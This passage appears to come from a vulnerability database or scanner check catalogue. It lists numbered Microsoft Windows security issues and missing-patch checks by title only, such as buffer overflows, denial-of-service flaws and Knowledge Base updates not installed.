Mobile Pictures and Videos JPEG denial of service [32001] Microsoft Windows Mobile Internet Explorer unspecified denial of service [31845] Microsoft Windows user account never used [31844] Microsoft Windows guest user account unchanged [31843] Microsoft Windows built-in guest account enumerated [31842] Microsoft Windows user account password unchanged [31821] Microsoft Windows time zone update for year 2007 [31288] Microsoft Windows Knowledge Base Article 929969 update not installed [31264] Microsoft Windows Knowledge Base Article 930178 update not installed [31210] Microsoft Windows Knowledge Base Article 927198 update is not installed [31199] Microsoft Windows Knowledge Base Article 921585 update is not installed [31191] Microsoft Windows Knowledge Base Article 925938 update is not installed [31176] Microsoft Windows CSRSS NtRaiseHardError() information disclosure [31085] Microsoft Windows Workstation service NetrWkstaUserEnum denial of service [31018] Microsoft Windows CSRSS MessageBox function privilege escalation [31015] Microsoft Windows Explorer WMV file denial of service [31014] Microsoft Windows Media Player MIDI file denial of service [31008] Microsoft Windows XP directory weak permission [30757] Microsoft Windows Knowledge Base Article 926121 update not installed [30756] Microsoft Windows Remote Installation Service code execution [30717] Microsoft Windows Print Spooler denial of service [30610] Microsoft Windows Knowledge Base Article 926436 update not installed [30608] Microsoft Windows Knowledge Base Article 926255 update not installed [30607] Microsoft Windows file manifest privilege escalation [30606] Microsoft Windows Knowledge Base Article 926247 update not installed [30605] Microsoft Windows SNMP service buffer overflow [30604] Microsoft Windows Knowledge Base Article 925454 update not installed [30599] Microsoft Windows Knowledge Base Article 924667 update not installed [30598] Microsoft Windows and Visual Studio MFC components RTF code execution [30597] Microsoft Windows Knowledge Base Article 923723 update not installed [30595] Microsoft Windows Knowledge Base Article 923689 update not installed [30594] Microsoft Windows Media Player ASF processing buffer overflow [30593] Microsoft Windows Knowledge Base Article 918118 update not installed [30592] Microsoft Windows and Office Rich Edit components code execution [30591] Microsoft Windows Knowledge Base Article 925674 update not installed [30586] Microsoft Windows Media Player ASX playlist buffer overflow [30553] Microsoft Windows Live Messenger emoticon denial of service [30172] Microsoft Windows Knowledge Base Article 928088 update not installed [30042] Microsoft Windows GDI kernel privilege escalation [29954] Microsoft Windows Knowledge Base Article 923980 update not installed [29953] Microsoft Windows Client Service for NetWare (CSNW) denial of service [29952] Microsoft Windows Client Service for NetWare (CSNW) buffer overflow [29950] Microsoft Windows Knowledge Base Article 920213 update is not installed [29949] Microsoft Windows Knowledge Base Article 924270 update not installed [29948] Microsoft Windows Workstation service NetpManageIPCConnect buffer overflow [29943] Microsoft Windows Knowledge Base Article 923789 update not installed [29917] Microsoft Windows XP NAT Helper ipnathlp.dll denial of service [29546] Microsoft Windows 2000/2003 user logoff initiated [29545] Microsoft Windows 2000/2003 system time changed [29544] Microsoft Windows 2000/2003 system security access removed [29543] Microsoft Windows 2000/2003 security access granted [29542] Microsoft Windows 2000/2003 SAM notification package loaded [29541] Microsoft Windows 2000/2003 primary security token issued [29540] Microsoft Windows 2000/2003 user password reset successful [29539] Microsoft Windows 2000/2003 object indirectly accessed [29538] Microsoft Windows 2000/2003 object handle duplicated [29537] Microsoft Windows 2000/2003 logon with explicit credentials success [29536] Microsoft Windows 2000/2003 logon attempt using explicit credentials unsuccessful [29535] Microsoft Windows 2000/2003 IPSEC policy agent failed [29534] Microsoft Windows 2000/2003 IPSEC policy agent disabled [29533] Microsoft Windows 2000/2003 IPSEC policy agent changed [29532] Microsoft Windows 2000/2003 IKE security association established [29531] Microsoft Windows 2000/2003 IKE quick mode association ended [29530] Microsoft Windows 2000/2003 IKE main mode association ended [29529] Microsoft Windows 2000/2003 IKE association negotiation failed [29528] Microsoft Windows 2000/2003 IKE association peer authentication failed [29527] Microsoft Windows 2000/2003 IKE association failed invalid proposal [29526] Microsoft Windows 2000/2003 IKE association failed authentication parameters [29525] Microsoft Windows 2000/2003 DPAPI master key backup attempted [29524] Microsoft Windows 2000/2003 DPAPI key recovery attempted [29523] Microsoft Windows 2000/2003 DPAPI auditable data unprotected [29522] Microsoft Windows 2000/2003 administrative group security descriptor set [29521] Microsoft Windows 2000/2003 account name changed [29400] Microsoft Windows drmstor.dll denial of service [29373] Microsoft Windows SMB rename denial of service [29369] Microsoft Windows Knowledge Base Article 922819 update is not installed [29253] Microsoft Windows error report transmission detected [29243] Microsoft Windows Knowledge Base Article 924164 update is not installed [29236] Microsoft Windows Knowledge Base Article 924163 update is not installed [29229] Microsoft Windows Knowledge Base Article 923694 update not installed [29227] Microsoft Outlook Express Windows Address Book (WAB) buffer overflow [29226] Microsoft Windows Knowledge Base Article 924554 update is not installed [29214] Microsoft Windows Knowledge Base Article 922581 update is not installed [29211] Microsoft Windows Knowledge Base Article 924191 update is not installed [29208] Microsoft Windows Knowledge Base Article 924496 update is not installed [29205] Microsoft Windows Object Packager file extension spoofing code execution [29204] Microsoft Windows Knowledge Base Article 923414 update is not installed [29202] Microsoft Windows Knowledge Base Article 922760 update is not installed [29201] Microsoft Windows Knowledge Base Article 923191 update is not installed [29171] Microsoft Windows Knowledge Base Article 925486 update is not installed [28664] Microsoft Windows Knowledge Base Article 922770 update is not installed [28660] Microsoft Windows Knowledge Base Article 921503 update is not installed [28659] Microsoft Windows OLE Automation code execution [28656] Microsoft Windows Knowledge Base Article 924090 update not installed [28652] Microsoft Windows Knowledge Base Article 920685 update is not installed [28649] Microsoft Windows Knowledge Base Article 910729 update is not installed [28646] Microsoft Windows Knowledge Base Article 919007 update is not installed [28643] Microsoft Windows XP PGM buffer overflow [28600] Microsoft Windows winhlp32 HLP file unspecified code execution [28512] Microsoft Internet Explorer multiple Windows 2000 COM object denial of service [28474] Microsoft Windows PNG IHDR block denial of service [28336] Symantec VERITAS Backup Exec for Windows Server RPC interface buffer overflow [28281] Microsoft Windows WMF gdi32.dll denial of service [28240] Microsoft Windows DNS client data string buffer overflow [28183] Microsoft Windows gdiplus.dll denial of service [28045] Microsoft Windows Knowledge Base Article 918899 update is not installed [28028] Microsoft Windows Knowledge Base Article 922616 update is not installed [28027] Microsoft Windows Knowledge Base Article 922968 update is not installed [28024] Microsoft Windows Knowledge Base Article 921645 update is not installed [28022] Microsoft Windows Knowledge Base Article 920670 update is not installed [28020] Microsoft Windows Hyperlink Object Library (hlink.dll) buffer overflow [28019] Microsoft Windows Knowledge Base Article 920214 update is not installed [28018] Microsoft Windows Knowledge Base Article 921398 update is not installed [28017] Microsoft Windows Knowledge Base Article 920958 update is not installed [28016] Microsoft Windows kernel system inputs buffer overflow [28015] Microsoft Windows Knowledge Base Article 920683 update is not installed [28014] Microsoft Windows Winsock API buffer overflow [28013] Microsoft Windows DNS client buffer overflow [28012] Microsoft Windows Knowledge Base Article 917422 update is not installed [28011] Microsoft Windows kernel exception handling code execution [28009] Microsoft Windows kernel Winlogon privilege escalation [28008] Microsoft Windows Knowledge Base Article 917008 update is not installed [28005] Microsoft Windows 2000 Management Console (MMC) resource file cross-site scripting [28004] Microsoft Windows Knowledge Base Article 921883 update is not installed [28002] Microsoft Windows Server service buffer overflow [27999] Microsoft Windows SMB malformed PIPE denial of service [27832] Microsoft Windows ASN.1 Library HTTP NTLM buffer overflow [27567] Microsoft Windows explorer.exe Internet Shortcut (.url) denial of service [27562] Microsoft Windows Knowledge Base Article 915384 update is not installed [27554] Microsoft Windows Knowledge Base Article 917284 update is not installed [27467] Microsoft Windows Knowledge Base Article 917285 update is not installed [27417] Microsoft Windows Live Messenger contact list denial of service [26905] Microsoft Windows Knowledge Base Article 918547 update is not installed [26903] Microsoft Windows Knowledge Base Article 917336 update is not installed [26886] Microsoft Windows Knowledge Base Article 917953 update is not installed [26884] Microsoft Windows Knowledge Base Article 917736 update is not installed [26883] Microsoft Windows Knowledge Base Article 917537 update is not installed [26882] Microsoft Windows Knowledge Base Article 917344 update is not installed [26880] Microsoft Windows Knowledge Base Article 917159 update is not installed [26876] Microsoft Windows Knowledge Base Article 916281 update is not installed [26874] Microsoft Windows Knowledge Base Article 914389 update is not installed [26871] Microsoft Windows Knowledge Base Article 914388 update is not installed [26868] Microsoft Windows Knowledge Base Article 917734 update is not installed [26867] Microsoft Windows Knowledge Base Article 911280 update is not installed [26865] Microsoft Windows Knowledge Base Article 917283 update is not installed [26861] Microsoft Windows Knowledge Base Article 918439 update is not installed [26834] Microsoft Windows TCP/IP protocol driver buffer overflow [26830] Microsoft Windows SMB invalid handle denial of service [26823] Microsoft Windows DHCP Client buffer overflow [26820] Microsoft Windows SMB Server service information disclosure [26818] Microsoft Windows Mailslot Server driver buffer overflow [26815] Microsoft Windows Graphics Rendering Engine (GRE) WMF code execution [26814] Microsoft Windows RRAS RASMAN buffer overflow [26813] Microsoft Windows Knowledge Base Article 916768 update is not installed [26812] Microsoft Windows RRAS buffer overflow [26809] Microsoft Windows ART image rendering library buffer overflow [26805] Microsoft Windows JScript code execution [26788] Microsoft Windows Media Player PNG buffer overflow [26487] Microsoft Windows NTDLL.DLL improper DOS to NT path conversion [26166] Microsoft Windows Knowledge Base Article 912442 update is not installed [26161] Microsoft Windows Knowledge Base Article 916803 update is not installed [26156] Microsoft Windows Knowledge Base Article 913580 update is not installed [25794] Microsoft Windows Knowledge Base Article 917627 update is not installed [25792] Microsoft Windows Knowledge Base Article 911567 update is not installed [25629] Microsoft Windows Knowledge Base Article 912812 update is not installed [25626] Microsoft Windows Knowledge Base Article 911562 update is not installed [25625] Microsoft Windows Knowledge Base Article 908531 not installed [25598] Microsoft Windows XP Firewall .exe firewall bypass [25597] Microsoft Windows XP Firewall ADS filename:stream syntax application alert bypass [25573] Microsoft Windows winhlp32.exe .hlp embedded image buffer overflow [25554] Microsoft Windows Explorer COM object code execution [25535] Microsoft Outlook Express Windows Address Book file buffer overflow [25370] Microsoft Windows Knowledge Base Article 901190 not installed [25369] Microsoft Windows DNS recursive query denial of service [25366] Microsoft Windows Knowledge Base Article 905755 update is not installed [25365] Microsoft Windows Knowledge Base Article 914798 update is not installed [25364] Microsoft Windows Knowledge Base Article 914451 update is not installed [25363] Microsoft Windows Knowledge Base Article 905756 update is not installed [25361] Microsoft Windows Knowledge Base Article 905758 update is not installed [25360] Microsoft Windows Knowledge Base Article 905754 update is not installed [25359] Microsoft Windows Knowledge Base Article 905555 update is not installed [25358] Microsoft Windows Knowledge Base Article 905646 update is not installed [25357] Microsoft Windows Knowledge Base Article 905757 update is not installed [25342] Microsoft Windows Knowledge Base Article 905553 update is not installed [25261] Microsoft Windows Knowledge Base Article 913433 is not installed [24586] Microsoft Windows DNS client ATMA data record buffer overflow [24512] Microsoft Windows Knowledge Base Article 911565 update is not installed [24511] Microsoft Windows Knowledge Base Article 911564 update is not installed [24509] Microsoft Windows Knowledge Base Article 889167 update is not installed [24496] Microsoft Windows Knowledge Base Article 911927 update is not installed [24495] Microsoft Windows Knowledge Base Article 913446 update is not installed [24494] Microsoft Windows Knowledge Base Article 910620 update is not installed [24493] Microsoft Windows Media Player Plugin EMBED element buffer overflow [24492] Microsoft Windows and Office Korean IME privilege elevation [24489] Microsoft Windows IGMP v3 denial of service [24488] Microsoft Windows Media Player BMP image parsing service buffer overflow [24474] Microsoft Windows 2000 LDAP client accepts untrusted CA [24473] Microsoft Windows 2000 event ID 565 not logged [24472] Microsoft Windows 2000 Event ID 1704 records incorrect group policy settings [24471] Microsoft Windows VDM information disclosure [24463] Microsoft Windows XP &quot [24407] Microsoft Windows 2000 SECEDIT command fails to set ACLs correctly [24405] Microsoft Windows 2000 UPN credentials with trailing dot group policy bypass [24403] Microsoft Windows 2000 WideCharToMultiByte() incorrect Japanese character conversion [24402] Microsoft Windows 2000 Terminal Service client IP not logged [24400] Microsoft Windows 2000 domain authentication can be bypassed by a local administrator [24157] Microsoft Windows wireless ad-hoc network unauthorized access [24044] Microsoft Windows GRE ExtCreateRegion() and ExtEscape() WMF denial of service [23978] Microsoft Windows Knowledge Base Article 912919 update is not installed [23926] Microsoft Windows Knowledge Base Article 908523 update is not installed [23924] Microsoft Windows Knowledge Base Article 908519 update is not installed [23922] Microsoft Windows embedded Open Type Web font buffer overflow [23846] Microsoft Windows GDI32.DLL WMF image rendering code execution [23453] Microsoft Windows COM object as ActiveX control allows execution of code [23450] Microsoft Windows Knowledge Base Article 905915 update is not installed [23447] Microsoft Windows APC queue list could allow elevated privileges [23284] Microsoft Windows SynAttackProtect denial of service [22899] Microsoft Windows Knowledge Base Article 902412 update is not installed [22882] Microsoft Windows Knowledge Base Article 896424 update is not installed [22877] Microsoft Windows Metafile image format buffer overflow [22876] Microsoft Windows Metafile and Enhance Metafile buffer overflow [22524] Microsoft Windows XP Wireless Zero Configuration service information disclosure [22514] Microsoft Windows Knowledge Base Article 902400 update is not installed [22512] Microsoft Windows Knowledge Base Article 907245 update is not installed [22502] Microsoft Windows Knowledge Base Article 905749 update is not installed [22501] Microsoft Windows Knowledge Base Article 900725 update is not installed [22498] Microsoft Windows XP tftp.exe heap overflow [22495] Microsoft Windows Collaboration Data Objects buffer overflow [22492] Microsoft Windows Knowledge Base Article 904706 update is not installed [22480] Microsoft Windows DirectShow .AVI file code execution [22479] Microsoft Windows HTML in preview fields execute code [22478] Microsoft Windows .lnk properties execute code [22477] Microsoft Windows .lnk file execute code [22476] Microsoft Windows Distributed Transaction Coordinator message denial of service [22475] Microsoft Windows Distributed Transaction Coordinator TIP denial of service [22473] Microsoft Windows COM code execution [22204] Microsoft Windows keybd_event or SendKeys allows elevated privileges [22156] Microsoft Windows Knowledge Base Article 899589 update is not installed [22089] Microsoft Windows Registry Editor Utility concealment [21980] Microsoft Windows Registry Editor Utility concealment [21978] Microsoft Windows user32.dll component denial of service [21954] Microsoft Windows Remote Desktop Protocol mstlsapi.dll Man-in-the-Middle [21931] Microsoft Windows XP memory leak [21895] Microsoft Windows Msdds.dll object command execution [21704] Microsoft Windows Knowledge Base Article 896727 update is not installed [21700] Microsoft Windows Client Service for NetWare code execution [21626] Microsoft Windows PKINIT protocol obtain information [21625] Microsoft Windows kerberos message denial of service [21605] Microsoft Windows Knowledge Base Article 896423 update is not installed [21604] Microsoft Windows print spooler buffer overflow [21603] Microsoft Windows Knowledge Base Article 899588 update is not installed [21602] Microsoft Windows Plug and Play buffer overflow [21601] Microsoft Windows Knowledge Base Article 899591 update is not installed [21600] Microsoft Windows Knowledge Base Article 893756 update is not installed [21599] Microsoft Windows telephony service buffer overflow [21539] Microsoft Windows USB device driver buffer overflow [21407] Microsoft Windows RDP request denial of service [21355] Microsoft Windows Network Connection Manager denial of service [21345] Microsoft Windows 2000 Update Rollup 1 for Service Pack 4 has not been installed [21272] Microsoft Windows Knowledge Base Article 903672 update is not installed [21269] Microsoft Windows Knowledge Base Article 901214 update is not installed [21221] Microsoft Windows Color Management Module buffer overflow [21214] Microsoft Windows NTFS allows attacker to obtain information [20829] Microsoft Windows Step-by-Step Interactive Training bookmark link file buffer overflow [20826] Microsoft Windows Knowledge Base Article 896422 update is not installed [20825] Microsoft Windows Knowledge Base Article 896358 update is not installed [20823] Microsoft Windows Knowledge Base Article 890169 update is not installed [20822] Microsoft Windows Knowledge Base Article 883939 update is not installed [20821] Microsoft Windows compiled Help (.CHM) integer overflow [20820] Microsoft Windows Knowledge Base Article 896426 update is not installed [20818] Microsoft Windows WebClient Service buffer overflow [20815] Microsoft Windows SMB process gain access [20629] Multiple Microsoft Windows IPv6 LAND denial of service [20546] Microsoft Windows Media Player allows creation of malicious media files [20382] Microsoft Windows Knowledge Base Article 894320 update is not installed [20380] Microsoft Windows Web View command execution [20318] Microsoft Windows Knowledge Base Article 893086 update is not installed [20317] Microsoft Windows Knowledge Base Article 890923 update is not installed [20000] Microsoft Windows Knowledge Base Article 892944 update is not installed [19969] Multiple Microsoft Windows Server 2003 Edition printer driver denial of service [19965] Multiple Microsoft Windows Server 2003 Editions SMB redirector denial of service [19843] Microsoft Windows Knowledge Base Article 894549 update is not installed [19836] Microsoft Windows CSRSS gain control [19835] Microsoft Windows HTML Application Host command execution [19834] Microsoft Windows object buffer overflow [19832] Microsoft Windows access requests gain privileges [19830] Microsoft Windows font buffer overflow [19829] Microsoft Windows Message Queuing component buffer overflow [19819] Microsoft Windows Remote Desktop &quot [19727] Microsoft Windows 2000 GDI32.DLL denial of service [19593] Microsoft Windows LAND denial of service [19288] IBM DB2 running on Microsoft Windows obtain information [19270] Microsoft Windows PNG image buffer overflow [19220] Microsoft Windows registry key connection denial of service [19110] Microsoft Windows Hyperlink Object Library code execution [19109] Microsoft Windows OLE code execution [19105] Microsoft Windows COM files gain privileges [19103] Multiple Microsoft Windows TCP/IP denial of service [19101] Microsoft Windows Servers License Logging service code execution [19096] Microsoft Windows Media Player PNG buffer overflow [19093] Microsoft Windows named pipe information disclosure [19091] Microsoft Windows SharePoint Services and SharePoint Team Services cross-site scripting [19089] Microsoft Windows SMB code execution [18879] Microsoft Windows USER32.DLL ANI header overflow [18768] Microsoft Windows Knowledge Base Article 891711 update is not installed [18766] Microsoft Windows Knowledge Base Article 871250 update is not installed [18758] Microsoft Windows Indexing Service allows code execution [18678] Microsoft Windows winhlp32.exe buffer overflow [18668] Microsoft Windows LoadImage API buffer overflow [18667] Microsoft Windows ANI file zero rate number overflow denial of service [18587] Microsoft Windows Media Player ActiveX object reveals existence of files [18576] Microsoft Windows Media Player mp3 code execution [18507] Microsoft Windows XP SP2 subnet option allows access to firewall exceptions [18394] Microsoft Windows Knowledge Base Article 870763 update is not installed [18393] Microsoft Windows Knowledge Base Article 873339 update is not installed [18392] Microsoft Windows Knowledge Base Article 885249 update is not installed [18391] Microsoft Windows Knowledge Base Article 885835 update is not installed [18390] Microsoft Windows Knowledge Base Article 885836 update is not installed [18378] Microsoft Windows Icon image anomaly detected [18342] Microsoft Windows NT DHCP HardwareAddress code execution [18341] Microsoft Windows NT DHCP MachineName denial of service [18340] Microsoft Windows LSASS gain privileges [18339] Microsoft Windows kernel LPC interface gain privileges [18338] Microsoft Windows Word for Windows 6.0 Converter font code execution [18337] Microsoft Windows Word for Windows 6.0 Converter table code execution [18336] Microsoft Windows HyperTerminal session file buffer overflow [18314] Microsoft Windows Knowledge Base Article 889293 update is not installed [18208] Microsoft Windows logon screen saver allows elevated privileges [17864] Microsoft Windows XP Explorer WAV file denial of service [17711] Microsoft Windows XP SP2 sessmgr.exe firewall bypass [17663] Microsoft Windows MS04-029 patch is not installed [17662] Microsoft Windows MS04-037 patch is not installed [17661] Microsoft Windows MS04-036 patch is not installed [17660] Microsoft Windows MS04-035 patch is not installed [17659] Microsoft Windows MS04-034 patch is not installed [17658] Microsoft Windows MS04-032 patch is not installed [17657] Microsoft Windows NetDDE MS04-031 patch is not installed [17641] Microsoft Windows NNTP buffer overflow [17624] Microsoft Windows XP and Windows Server 2003 Compressed Folders buffer overflow [17621] Microsoft Windows 2003 SMTP service code execution [17560] Microsoft Windows 2000 and XP GDI library denial of service [17521] Microsoft Windows 2000 Service Pack 4 is not installed [17458] Microsoft Windows CE KDataStruct information disclosure [17457] Microsoft Windows XP Explorer.exe TIFF denial of service [17455] Microsoft Windows XP information disclosure [17412] IBM with Microsoft Windows XP Professional has default administrator account [17341] Microsoft Windows MS04-028 patch is not installed [17052] Microsoft Windows XP and Internet Explorer displays improper file icon [17051] Microsoft Windows XP Content-Location bypass Local Computer zone restrictions [17023] Microsoft Windows XP Windows Explorer bypass Zone Identifier (ZoneID) feature [17009] Microsoft Windows XP ICF bypass filter [17004] Microsoft Windows XP Service Pack 2 is not installed on the system [16913] Microsoft Windows 2003 users with Synchronize directory service data privilege [16912] Microsoft Windows 2003 groups with Synchronize directory service data privilege [16909] Microsoft Windows 2003 groups with Remove computer from docking station privilege [16907] Microsoft Windows 2003 users with Create global objects privilege [16905] Microsoft Windows 2003 users or groups with Create global objects privilege [16851] Microsoft Windows 2003 and XP WinKey and U key denial of service [16704] Microsoft Windows 2000 Media Player control code execution [16664] Microsoft Windows Program Group Converter buffer overflow [16627] Microsoft Windows System32 write file to the directory has been detected [16597] Microsoft Windows Windows Shell allows code execution [16592] Microsoft Windows Utility Manager gain privileges [16591] Microsoft Windows Task Scheduler buffer overflow [16590] Microsoft Windows POSIX buffer overflow allows local attacker to gain privileges [16587] Microsoft Windows Network Dynamic Data Exchange Running [16586] Microsoft Windows HTML Help could allow execution of code [16582] Microsoft Windows Server 2003 kernel CPU denial of service [16581] Microsoft Windows Enhanced Metafile (EMF) buffer overflow [16580] Microsoft Windows Virtual DOS Machine (VDM) allows elevated privileges [16579] Microsoft Windows Window Management API allows elevated privileges [16572] Microsoft Windows 2003 Users with Impersonate a client after authentication privilege [16570] Microsoft Windows 2003 Users with Create global objects privilege [16564] Microsoft Windows 2003 Groups with Create global objects privilege [16562] Microsoft Windows 2003 Groups with &quot [16556] Microsoft Windows NetDDE buffer overflow [16522] Microsoft Windows 2003 Impersonate a client after authentication privilege [16521] Microsoft Windows 2003 Deny Logon Through Terminal Services privilege [16520] Microsoft Windows 2003 Create global objects privilege [16362] Microsoft Windows XP Help Center and Support starts automatically [16304] Microsoft Windows JPEG buffer overflow [16276] Microsoft Windows 2000 Advanced Server fully qualified domain name security bypass [16270] Microsoft Windows IPSec filter bypass [16213] Microsoft Windows Local Security Authority buffer overflow exploit attempt detected [16211] Microsoft Windows Service Host buffer overflow exploit attempt detected [16210] Microsoft Windows Service Host buffer overflow exploit attempt detected [16207] Microsoft Windows kernel buffer overflow exploit attempt detected [16206] Microsoft Windows Command Shell buffer overflow exploit attempt detected [16171] Microsoft Windows XP Explorer code execution [16154] Microsoft Windows NT 4.0 TSE Security Patch denial of service [16095] Microsoft Windows XP and Windows Server 2003 HCP URL code execution [15956] Microsoft Windows long file share name buffer overflow [15818] Microsoft Windows MS04-011 patch is not installed [15813] Microsoft Windows MS04-014 patch is not installed [15811] Microsoft Windows MS04-012 patch is not installed [15715] Microsoft Windows Negotiate Security Software Provider buffer overflow [15714] Microsoft Windows Virtual DOS Machine allows elevated privileges [15713] Microsoft Windows ASN.1 double-free [15711] Microsoft Windows object identifier could be used to open network ports [15710] Microsoft Windows H.323 buffer overflow [15707] Microsoft Windows Local Descriptor Table allows privilege escalation [15704] Microsoft Windows XP and Windows Server 2003 HCP URL code execution [15702] Microsoft Windows winlogon buffer overflow [15700] Microsoft Windows 2000 Domain Controller LSASS LDAP message denial of service [15699] Microsoft Windows LSASS buffer overflow [15678] Microsoft Windows XP task creation allows privilege escalation [15632] Microsoft Windows 2000 Utility Manger allows privilege escalation [15589] Microsoft Windows allows elevated privileges [15507] Microsoft Windows XP Explorer wmf denial of service [15461] Microsoft Windows MS04-008 patch is not installed [15394] Microsoft Windows service running under non-built-in accounts has been detected [15284] Microsoft Windows XP Windows shell shimgvw.dll buffer overflow [15263] Microsoft Windows XP and 2000 Server kernel allows elevated privileges [15256] Microsoft Windows ASN.1 buffer overflow packet using NTLM has been detected [15255] Microsoft Windows ASN.1 buffer overflow packet using SMTP has been detected [15223] Microsoft Windows access violation or exception code has been detected [15218] Microsoft Windows command shell backdoor [15101] Microsoft Windows XP helpctr.exe cross-site scripting [15057] Microsoft Windows XP and Windows Server 2003 smbmount Linux client denial of service [15039] Microsoft Windows ASN.1 Library buffer overflow [15038] Microsoft Windows 2000 Server Windows Media Services denial of service [15037] Microsoft Windows Server 2003 WINS /GS flag denial of service [14924] Microsoft Windows XP folder containing HTML code and executable file code execution [13786] Microsoft Windows MS03-051 patch is not installed [13785] Microsoft Windows MS03-048 patch is not installed [13784] Microsoft Windows MS03-050 patch is not installed [13639] Microsoft Windows Workstation buffer overflow [13638] Microsoft Windows MS03-049 patch is not installed [13558] Microsoft Windows XP CommCtl32.dll could allow an attacker to execute code [13509] Microsoft Windows HTML Help could allow an attacker to gain privileges [13482] Microsoft Windows MS03-047 patch is not installed [13480] Microsoft Windows MS03-046 patch is not installed [13478] Microsoft Windows MS03-044 patch is not installed [13473] Microsoft Windows MS03-045 patch is not installed [13472] Microsoft Windows MS03-042 patch is not installed [13471] Microsoft Windows MS03-041 patch is not installed [13444] Microsoft Windows Non-English patched with MS03-045 denial of service in Sophos Anti-Virus [13424] Microsoft Windows User32.dll ListBox and ComboBox controls buffer overflow [13423] Microsoft Windows 2000 Local Troubleshooter ActiveX control buffer overflow [13422] Microsoft Windows Authenticode could allow an attacker to execute code [13420] Microsoft Windows HSC HCP protocol file buffer overflow [13413] Microsoft Windows Messenger Service popup buffer overflow [13412] Microsoft Windows MS03-043 patch is not installed [13407] Microsoft Windows 2000 Server mqsvc.exe MQLocateBegin packet buffer overflow [13385] Microsoft Windows Server 2003 &quot [13375] Microsoft Windows Media Player Dynamic HTML behaviors allows an attacker to execute code [13364] Microsoft Windows MS03-040 patch is not installed [13344] Microsoft Windows 98 flood of fragmented UDP packets causes denial of service [13342] Microsoft Windows PostThreadMessage API allows processes to be terminated without permission [13211] Microsoft Windows 2000 and XP URG memory leak [13183] Microsoft Windows service pack detected [13171] Microsoft Windows Server 2003 can allow attacker to bypass mechanism used to detect buffer overflows [13134] Microsoft Windows MS03-039 patch is not installed [13131] Microsoft Windows 2000 Message Queue Manager buffer overflow [13105] Microsoft Windows Update fails to notify users of updates when host-blocking is used [13095] Microsoft Windows auto update is disabled [13089] Microsoft Windows NetBIOS Name Service information disclosure [12903] Microsoft Windows command shell banner [12835] Microsoft Windows Pocket PC could allow an attacker to gain access [12762] Microsoft Windows NT 4.0 Q823803i patch RRAS denial of service [12724] Microsoft Windows Media Player ASF file could allow code execution [12701] Microsoft Windows NT 4.0 Server file management function denial of service [12652] Microsoft Windows 2000 and NT 4.0 Server IIS ISAPI nsiislog.dll extension POST request buffer overflow [12620] Microsoft Windows 2000 Server SMTP FILETIME denial of service [12544] Microsoft Windows Servers SMB packet buffer overflow [12543] Microsoft Windows 2000 Accessibility Utility Manager could allow an attacker to gain privileges [12533] Microsoft Windows MS03-010 patch is not installed [12521] Microsoft Windows Rundll32.exe overly long routine name buffer overflow [12493] Microsoft Windows Shell32.dll 2000 ShellExecute function buffer overflow [12489] Microsoft Windows 2000 Server Active Directory buffer overflow [12442] Microsoft Windows XP SP1 Windows shell desktop.ini buffer overflow [12440] Microsoft Windows Media Player ActiveX control could disclose sensitive information [12187] Microsoft Windows XP gethostbyaddr() denial of service [12128] Microsoft Windows 2000 and Windows NT MS03-019 patch is not installed [12092] Microsoft Windows 2000 and NT 4.0 Server IIS ISAPI nsiislog.dll extension buffer overflow [12048] Microsoft Windows 2000 and Windows Server 2003 LAN Manager hash creation enabled [11953] Microsoft Windows Media Player skin downloading could allow an attacker to execute code [11824] Microsoft Windows XP Service Control Manager (SCM) race condition [11822] Microsoft Windows regedit.exe command execution [11816] Microsoft Windows 2000 Terminal Services MSGINA.DLL insecure access permissions [11810] Microsoft Windows win2k.sys EngTextOut denial of service [11803] Microsoft Windows kernel LpcRequestWaitReplyPort() buffer overflow [11696] Microsoft Windows 2000 Terminal Services man-in-the-middle attack [11617] Microsoft Windows 2000 MS03-007 patch is not installed on the system [11575] Microsoft Windows Script Engine buffer overflow [11546] Microsoft Windows 2000 Windows Help Facility .cnt file buffer overflow [11536] Microsoft Windows PostMessage() API function could disclose password [11505] Microsoft Windows XP Safe Mode bypass [11425] Microsoft Windows Me HSC hcp:// buffer overflow [11344] Microsoft Windows riched20.dll attribute label buffer overflow [11329] Microsoft Windows NT and 2000 cmd.exe CD path name buffer overflow [11274] Microsoft Windows 2000 NetBIOS continuation packets denial of service [11260] Microsoft Windows XP Windows Redirector buffer overflow [11216] Microsoft Windows NT and 2000 command prompt denial of service [11141] Microsoft Windows 2000 Terminal Services MSGINA.DLL denial of service [11132] Microsoft Windows Locator service buffer overflow [11030] Microsoft Windows OpenType font (.otf) fontview denial of service [10958] Microsoft Windows File Protection certificate chains with a trusted root CA are accepted [10957] Microsoft Windows File Protection fails to remove old security catalog .CAT files [10892] Microsoft Windows XP Shell media file buffer overflow [10843] Microsoft Windows 2000 and XP SMB signing group policy modification [10764] Microsoft Windows XP wireless LAN feature could leak information [10736] Microsoft Windows XP Fast User Switching could disclose user processes [10431] Microsoft Windows 2000 SNMP LANMAN Extension memory leak denial of service [10398] Microsoft Windows Media Player world-writable executables [10377] Microsoft Windows XP and 2000 administrative alerts fail when security event log is full [10343] Microsoft Windows NetDDE Agent can be used to gain elevated privileges [10279] Microsoft Windows XP &quot [10259] Microsoft Services for Unix (SFU) invalid RPC packet denial of service [10258] Microsoft Services for Unix (SFU) RPC parameter size buffer overflow could crash the server [10254] Microsoft Windows compiled HTML Help (.chm) files could be used to execute code [10253] Microsoft Windows HTML Help ActiveX buffer overflow [10252] Microsoft Windows zipped file decompression incorrect target path [10251] Microsoft Windows zipped file decompression buffer overflow [10215] Microsoft Windows Scripting Host is running on the system [10199] Microsoft Windows 2000/XP PPTP packet buffer overflow [10132] Microsoft Windows fails to properly check execute permissions for 16-bit executable files [10122] Microsoft Windows Remote Desktop Protocol could allow an attacker to monitor keystrokes [10121] Microsoft Windows Remote Desktop Protocol checksum information leak [10120] Microsoft Windows XP Remote Desktop malformed PDU Confirm Active packet denial of service [9982] Microsoft Windows Certificate Enrollment Control ActiveX control could be used to delete digital certificates [9971] Microsoft Windows Media Player .wmf file extension or content type spoofing [9953] Microsoft Windows Media Player WMD code execution [9946] Microsoft Windows 2000 Terminal Services session screensaver fails to lock the console [9933] Microsoft Windows NT/2000/XP SMB packet request buffer overflow [9878] Microsoft Windows XP Help and Support Center HCP:// URL could be used to delete files [9869] Microsoft Windows NTFS hard links could bypass event auditing logs [9856] Microsoft Windows 2000 NCM handler routine could allow elevated privileges [9789] Microsoft Exchange MSRPC denial of service [9779] Microsoft Windows 2000 weak system partition permissions [9752] Microsoft Windows 2000 Service Pack 3 is not installed [9746] Microsoft Windows 2000 HTML Help item parameter buffer overflow [9727] Microsoft Windows Media Player mplay32 long file name buffer overflow [9625] Microsoft Windows 2000 Narrator allows login information to be audible [9422] Microsoft Windows Media 